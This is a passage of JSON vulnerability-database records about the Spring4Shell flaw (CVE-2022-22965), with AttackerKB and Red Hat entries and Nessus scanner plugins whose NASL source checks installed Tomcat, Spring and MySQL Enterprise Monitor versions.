"NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-27T09:45:24", "id": "RHSA-2022:1626", "href": "https://access.redhat.com/errata/RHSA-2022:1626", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2022-05-10T18:27:10", "description": "A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\n \n**Recent assessments:** \n \n**jbaines-r7** at April 01, 2022 6:13pm UTC reported:\n\nIt\u2019s currently difficult to assess the exact value of this vulnerability because we don\u2019t know how common the vulnerable configuration is. We might not even be aware of all the vulnerable configurations at this time. See the Rapid7 analysis for additional details.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T00:00:00", "type": "attackerkb", "title": "CVE-2022-22965", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-02T00:00:00", "id": "AKB:F4BF02AE-B090-4307-89AA-47E57C92EC8F", "href": "https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2022-04-11T21:53:08", "description": "The version of Apache Tomcat installed on the remote host is 8.x prior to 8.5.78.\n\nThis version of Apache Tomcat does not have mitigations in place to protect against Spring4Shell (CVE-2022-22965). While this does not represent a vulnerability in Apache Tomcat itself, it is recommend to update Apache Tomcat to a version with the Spring4Shell mitigations present.\n\nNote that Nessus has not tested for the mitigations but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-04-01T00:00:00", "type": "nessus", "title": "Apache Tomcat 8.x < 8.5.78 Spring4Shell (CVE-2022-22965) Mitigations", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_8_5_78.NASL", "href": "https://www.tenable.com/plugins/nessus/159462", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159462);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_name(english:\"Apache Tomcat 8.x < 8.5.78 Spring4Shell (CVE-2022-22965) Mitigations\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server does not have the Spring4Shell (CVE-2022-22965) mitigations\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat installed on the remote host is 8.x prior to 8.5.78.\n\nThis version of Apache Tomcat does not have mitigations in place to protect against Spring4Shell (CVE-2022-22965). While\nthis does not represent a vulnerability in Apache Tomcat itself, it is recommend to update Apache Tomcat to a version\nwith the Spring4Shell mitigations present.\n\nNote that Nessus has not tested for the mitigations but has instead relied only on the application's self-reported\nversion number.\");\n # https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2401ae46\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 8.5.78 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_attribute(attribute:\"risk_factor\", value:\"None\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude('tomcat_version.inc');\n\ntomcat_check_version(fixed:'8.5.78', min:'8.0.0', severity:SECURITY_NOTE, granularity_regex: \"^8(\\.[012345])?$\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-04-22T19:43:26", "description": "Spring MVC and Spring WebFlux applications, when packaged as a traditional WAR file, running on JDK version 9 and higher in an Apache Tomcat servlet container and exposing one or more endpoints with DataBinder enabled, suffer from a Remote Code Execution (RCE) vulnerability.\n\nBy crafting a specific HTTP request, an attacker could leverage the vulnerability to compromise the target by, for example, hosting a web shell on the target application.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-03-31T00:00:00", "type": "nessus", "title": "Spring Framework < 5.2.20 / 5.3.x < 5.3.18 Remote Code Execution (Spring4Shell)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_113217", "href": "https://www.tenable.com/plugins/was/113217", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-15T15:41:27", "description": "The remote host contains a Spring Framework library version that is prior to 5.2.20 or 5.3.x prior to 5.3.18. It is, therefore, affected by a remote code execution vulnerability:\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n - These are the prerequisites for the exploit:\n - JDK 9 or higher\n - Apache Tomcat as the Servlet container\n - Packaged as WAR\n - spring-webmvc or spring-webflux dependency", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-04-06T00:00:00", "type": "nessus", "title": "Spring Framework Spring4Shell (CVE-2022-22965)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-13T00:00:00", "cpe": ["cpe:/a:pivotal_software:spring_framework", "cpe:/a:vmware:spring_framework"], "id": "SPRING4SHELL.NBIN", "href": "https://www.tenable.com/plugins/nessus/159542", "sourceData": "Binary data spring4shell.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-11T21:52:08", "description": "The version of Apache Tomcat installed on the remote host is 9.x prior to 9.0.62.\n\nThis version of Apache Tomcat does not have mitigations in place to protect against Spring4Shell (CVE-2022-22965). While this does not represent a vulnerability in Apache Tomcat itself, it is recommend to update Apache Tomcat to a version with the Spring4Shell mitigations present.\n\nNote that Nessus has not tested for the mitigations but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-04-01T00:00:00", "type": "nessus", "title": "Apache Tomcat 9.x < 9.0.62 Spring4Shell (CVE-2022-22965) Mitigations", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_9_0_62.NASL", "href": "https://www.tenable.com/plugins/nessus/159464", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159464);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_name(english:\"Apache Tomcat 9.x < 9.0.62 Spring4Shell (CVE-2022-22965) Mitigations\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server does not have the Spring4Shell (CVE-2022-22965) mitigations\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat installed on the remote host is 9.x prior to 9.0.62.\n\nThis version of Apache Tomcat does not have mitigations in place to protect against Spring4Shell (CVE-2022-22965). While\nthis does not represent a vulnerability in Apache Tomcat itself, it is recommend to update Apache Tomcat to a version\nwith the Spring4Shell mitigations present.\n\nNote that Nessus has not tested for the mitigations but has instead relied only on the application's self-reported\nversion number.\");\n # https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2401ae46\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 9.0.62 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_attribute(attribute:\"risk_factor\", value:\"None\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude('tomcat_version.inc');\n\ntomcat_check_version(fixed:'9.0.62', min:'9.0.0', severity:SECURITY_NOTE, granularity_regex: \"^9(\\.0)?$\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-04-11T21:52:34", "description": "The version of Apache Tomcat installed on the remote host is 10.x prior to 10.0.20.\n\nThis version of Apache Tomcat does not have mitigations in place to protect against Spring4Shell (CVE-2022-22965). While this does not represent a vulnerability in Apache Tomcat itself, it is recommend to update Apache Tomcat to a version with the Spring4Shell mitigations present.\n\nNote that Nessus has not tested for the mitigations but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-04-01T00:00:00", "type": "nessus", "title": "Apache Tomcat 10.x < 10.0.20 Spring4Shell (CVE-2022-22965) Mitigations", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_10_0_20.NASL", "href": "https://www.tenable.com/plugins/nessus/159463", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159463);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_name(english:\"Apache Tomcat 10.x < 10.0.20 Spring4Shell (CVE-2022-22965) Mitigations\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server does not have the Spring4Shell (CVE-2022-22965) mitigations\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat installed on the remote host is 10.x prior to 10.0.20.\n\nThis version of Apache Tomcat does not have mitigations in place to protect against Spring4Shell (CVE-2022-22965). While\nthis does not represent a vulnerability in Apache Tomcat itself, it is recommend to update Apache Tomcat to a version\nwith the Spring4Shell mitigations present.\n\nNote that Nessus has not tested for the mitigations but has instead relied only on the application's self-reported\nversion number.\");\n # https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2401ae46\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 10.0.20 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_attribute(attribute:\"risk_factor\", value:\"None\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude('tomcat_version.inc');\n\ntomcat_check_version(fixed:'10.0.20', min:'10.0.0', severity:SECURITY_NOTE, granularity_regex: \"^10(\\.0)?$\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-05-16T01:46:30", "description": "The remote host contains a Spring Framework library version that is prior to 5.2.20 or 5.3.x prior to 5.3.18. It is, therefore, affected by a remote code execution vulnerability:\n\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\n - These are the prerequisites for the exploit:\n - JDK 9 or higher\n - Apache Tomcat as the Servlet container\n - Packaged as WAR\n - spring-webmvc or spring-webflux dependency\n\nNote that users are required to enable the 'Show potential false alarms' setting, also known as paranoid mode, in their scan policy in order to enable this plugin in a scan. In addition, the 'Perform thorough tests' setting must be enabled as well.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-03-31T00:00:00", "type": "nessus", "title": "Spring Framework < 5.2.20 / 5.3.x < 5.3.18 Remote Code Execution (CVE-2022-22965)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-11T00:00:00", "cpe": ["cpe:/a:pivotal_software:spring_framework", "cpe:/a:vmware:spring_framework"], "id": "SPRING_CVE-2022-22965_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/159374", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159374);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/11\");\n\n script_cve_id(\"CVE-2022-22965\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/25\");\n\n script_name(english:\"Spring Framework < 5.2.20 / 5.3.x < 5.3.18 Remote Code Execution (CVE-2022-22965)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web application framework library that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a Spring Framework library version that is prior to 5.2.20 or 5.3.x prior to 5.3.18. It is,\ntherefore, affected by a remote code execution vulnerability:\n\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via\n data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application\n is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the\n nature of the vulnerability is more general, and there may be other ways to exploit it.\n\n - These are the prerequisites for the exploit:\n - JDK 9 or higher\n - Apache Tomcat as the Servlet container\n - Packaged as WAR\n - spring-webmvc or spring-webflux dependency\n\nNote that users are required to enable the 'Show potential false alarms' setting, also known as paranoid mode, in their\nscan policy in order to enable this plugin in a scan. In addition, the 'Perform thorough tests' setting must be enabled\nas well.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tanzu.vmware.com/security/cve-2022-22965\");\n # https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?718f9ac3\");\n # https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2401ae46\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Spring Framework version 5.2.20 or 5.3.18 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Spring Framework Class property RCE (Spring4Shell)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/31\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"requires_paranoid_scanning\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pivotal_software:spring_framework\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:spring_framework\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"spring_jar_detection.nbin\", \"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\", \"java_jre_installed_unix.nbin\", \"java_jre_installed_win.nbin\");\n script_require_keys(\"installed_sw/Spring Framework\", \"installed_sw/Apache Tomcat\", \"installed_sw/Java\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('tomcat_version.inc');\n\nvar app_info = vcf::combined_get_app_info(app:'Spring Framework');\n\n# A vuln version of Java must be installed for the exploit to work\nvar java_exit_message = 'A vulnerable version of Java is not installed. Spring Framework is, therefore, not vulnerable.';\nvar java_install_count = get_install_count(app_name:'Java', exit_if_zero:FALSE);\nif (java_install_count < 1)\n exit(0, java_exit_message);\nvar java_installs = get_combined_installs(app_name:'Java');\nif (java_installs[0] != IF_OK)\n exit(0, java_exit_message);\n\n# JDK 9+ is vulnerable\n# Exit if all detected Java installs are < 9\nvar vuln_java = FALSE;\nforeach var java_install (java_installs[1])\n{\n var java_version = str_replace(string:java_install.version, find:'_', replace:'.');\n if ( ver_compare(ver:java_version, fix:'1.9.0', strict:FALSE) >= 0 )\n {\n vuln_java = TRUE;\n break;\n }\n}\n\nif (!vuln_java)\n exit(0, java_exit_message);\n\n# A \"vulnerable\" version of Tomcat must be installed for the exploit to work\nvar tomcat_exit_message = 'A vulnerable version of Apache Tomcat is not installed. Spring Framework is, therefore, not vulnerable.';\nvar tomcat_install_count = get_install_count(app_name:'Apache Tomcat', exit_if_zero:FALSE);\nif (tomcat_install_count < 1)\n exit(0, tomcat_exit_message);\nvar tomcat_installs = get_combined_installs(app_name:'Apache Tomcat');\nif (tomcat_installs[0] != IF_OK)\n exit(0, tomcat_exit_message);\n\n# Tomcat 10.0.20, 9.0.62, and 8.5.78 are patched\n# Exit if all detected Tomcat installs are patched\nvar vuln_tomcat = FALSE;\nforeach var install (tomcat_installs[1])\n{\n if (\n tomcat_ver_cmp(ver:install.version, fix:'10.0.20', same_branch:TRUE) < 0 ||\n tomcat_ver_cmp(ver:install.version, fix:'9.0.62', same_branch:TRUE) < 0 ||\n tomcat_ver_cmp(ver:install.version, fix:'8.5.78', same_branch:TRUE) < 0\n )\n {\n vuln_tomcat = TRUE;\n break;\n }\n}\n\nif (!vuln_tomcat)\n exit(0, tomcat_exit_message);\n\n# Non-default configuration\nif (report_paranoia < 2) \n audit(AUDIT_PARANOID);\n\nvar constraints = [\n { 'fixed_version':'5.2.20' },\n { 'min_version':'5.3', 'fixed_version':'5.3.18' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-15T15:43:32", "description": "The version of MySQL Enterprise Monitor installed on the remote host are affected by multiple vulnerabilities as referenced in the April 2022 CPU advisory.\n\n - Vulnerability in the MySQL Enterprise Monitor product of Oracle MySQL (component: Monitoring: General (Apache Log4j)). Supported versions that are affected are 8.0.29 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Enterprise Monitor. Successful attacks of this vulnerability can result in takeover of MySQL Enterprise Monitor. (CVE-2022-23305)\n\n - Vulnerability in the MySQL Enterprise Monitor product of Oracle MySQL (component: Monitoring: General (Spring Framework)). Supported versions that are affected are 8.0.29 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Enterprise Monitor. Successful attacks of this vulnerability can result in takeover of MySQL Enterprise Monitor. (CVE-2022-22965)\n\n - Vulnerability in the MySQL Enterprise Monitor product of Oracle MySQL (component: Monitoring: General (Apache Tomcat)). Supported versions that are affected are 8.0.29 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Enterprise Monitor. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Enterprise Monitor. (CVE-2021-42340)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-04-20T00:00:00", "type": "nessus", "title": "Oracle MySQL Enterprise Monitor (Apr 2022 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-41184", "CVE-2021-42340", "CVE-2021-44832", "CVE-2022-0778", "CVE-2022-22965", "CVE-2022-23181", "CVE-2022-23305"], "modified": "2022-05-11T00:00:00", "cpe": ["cpe:/a:oracle:mysql_enterprise_monitor"], "id": "MYSQL_ENTERPRISE_MONITOR_8_0_30.NASL", "href": "https://www.tenable.com/plugins/nessus/159917", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159917);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/11\");\n\n script_cve_id(\n \"CVE-2021-41184\",\n \"CVE-2021-42340\",\n \"CVE-2021-44832\",\n \"CVE-2022-0778\",\n \"CVE-2022-22965\",\n \"CVE-2022-23181\",\n \"CVE-2022-23305\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/25\");\n script_xref(name:\"IAVA\", value:\"2022-A-0168\");\n\n script_name(english:\"Oracle MySQL Enterprise Monitor (Apr 2022 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of MySQL Enterprise Monitor installed on the remote host are affected by multiple vulnerabilities as\nreferenced in the April 2022 CPU advisory.\n\n - Vulnerability in the MySQL Enterprise Monitor product of Oracle MySQL (component: Monitoring: General\n (Apache Log4j)). Supported versions that are affected are 8.0.29 and prior. Easily exploitable\n vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise\n MySQL Enterprise Monitor. Successful attacks of this vulnerability can result in takeover of MySQL\n Enterprise Monitor. (CVE-2022-23305)\n\n - Vulnerability in the MySQL Enterprise Monitor product of Oracle MySQL (component: Monitoring: General\n (Spring Framework)). Supported versions that are affected are 8.0.29 and prior. Easily exploitable\n vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise\n MySQL Enterprise Monitor. Successful attacks of this vulnerability can result in takeover of MySQL\n Enterprise Monitor. (CVE-2022-22965)\n\n - Vulnerability in the MySQL Enterprise Monitor product of Oracle MySQL (component: Monitoring: General\n (Apache Tomcat)). Supported versions that are affected are 8.0.29 and prior. Easily exploitable\n vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise\n MySQL Enterprise Monitor. Successful attacks of this vulnerability can result in unauthorized ability to\n cause a hang or frequently repeatable crash (complete DOS) of MySQL Enterprise Monitor. (CVE-2021-42340)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/docs/tech/security-alerts/cpuapr2022cvrf.xml\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpuapr2022.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2022 Oracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22965\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-23305\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Spring Framework Class property RCE (Spring4Shell)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:mysql_enterprise_monitor\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\", \"oracle_mysql_enterprise_monitor_local_nix_detect.nbin\", \"oracle_mysql_enterprise_monitor_local_detect.nbin\", \"macosx_mysql_enterprise_monitor_installed.nbin\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::combined_get_app_info(app:'MySQL Enterprise Monitor');\n\nvar constraints = [\n { 'min_version' : '8.0', 'fixed_version' : '8.0.30' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": 